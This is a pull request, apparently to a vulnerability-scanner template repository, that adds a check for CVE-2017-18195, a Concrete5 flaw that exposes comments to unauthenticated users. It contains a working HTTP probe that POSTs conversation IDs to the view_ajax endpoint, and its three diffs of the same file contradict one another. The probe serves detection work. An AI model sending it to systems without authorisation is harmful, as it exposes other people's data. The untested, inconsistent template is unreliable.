### PR TITLE
CVE-2017-18195 added

### DIFF
--- a/http/cves/2017/CVE-2017-18195.yaml
+++ b/http/cves/2017/CVE-2017-18195.yaml
@@ -1,21 +1,14 @@
 id: CVE-2017-18195
-
 info:
-  name: Concrete5 < 8.3 Authorization Bypass (CVE-2017-18195)
-  author: Chapman Schleiss 
+  name: Concrete5 < 8.3 Authorization Bypass
+  author: Chapman Schleiss
   severity: medium
   description: An issue was discovered in Concrete5 before 8.3.0 where unauthenticated users can view comments.
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
-    cvss-score: 5.3
-  reference: 
-    - https://nvd.nist.gov/vuln/detail/CVE-2017-18195
-
 http:
   - method: POST
     path:
       - "{{BaseURL}}/index.php/tools/required/conversations/view_ajax"
-    body: "cnvID={{range(1,10)}}&cID=1"
+    body: "cnvID={{start_id}}&cID=1"
     matchers-condition: and
     matchers:
       - type: word
@@ -23,6 +16,3 @@ http:
           - "<span class=\"ccm-conversation-message-username\">"
           - "<div class=\"ccm-conversation-message-body\">"
         part: body
-      - type: status
-        status:
-          - 200 

--- a/http/cves/2017/CVE-2017-18195.yaml
+++ b/http/cves/2017/CVE-2017-18195.yaml
@@ -1,0 +1,29 @@
+id: CVE-2017-18195
+
+info:
+  name: Concrete5 < 8.3 Authorization Bypass (CVE-2017-18195)
+  author: Chapman Schleiss
+  severity: medium
+  description: An issue was discovered in Concrete5 before 8.3.0 where unauthenticated users can view comments.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    tags: cms,concrete
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-18195
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/index.php/tools/required/conversations/view_ajax"
+    body: "cnvID={{range(1,10)}}&cID=1"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<span class=\"ccm-conversation-message-username\">"
+          - "<div class=\"ccm-conversation-message-body\">"
+        part: body
+      - type: status
+        status:
+          - 200

--- a/http/cves/2017/CVE-2017-18195.yaml
+++ b/http/cves/2017/CVE-2017-18195.yaml
@@ -2,17 +2,16 @@ id: CVE-2017-18195
 
 info:
   name: Concrete5 < 8.3 Authorization Bypass (CVE-2017-18195)
-  author: Chapman Schleiss
+  author: Chapman Schleiss 
   severity: medium
   description: An issue was discovered in Concrete5 before 8.3.0 where unauthenticated users can view comments.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
-    tags: cms,concrete
-  reference:
+  reference: 
     - https://nvd.nist.gov/vuln/detail/CVE-2017-18195
 
-requests:
+http:
   - method: POST
     path:
       - "{{BaseURL}}/index.php/tools/required/conversations/view_ajax"
@@ -26,4 +25,4 @@ requests:
         part: body
       - type: status
         status:
-          - 200
+          - 200 


### PR DESCRIPTION

CVE-2017-18195 added.

An issue was discovered in Concrete5 before 8.3.0 where unauthenticated users can view comments.

References:
https://nvd.nist.gov/vuln/detail/CVE-2017-18195
https://cxsecurity.com/issue/WLB-2018020297

I've validated this template locally?
- [ ] YES
- [X] NO

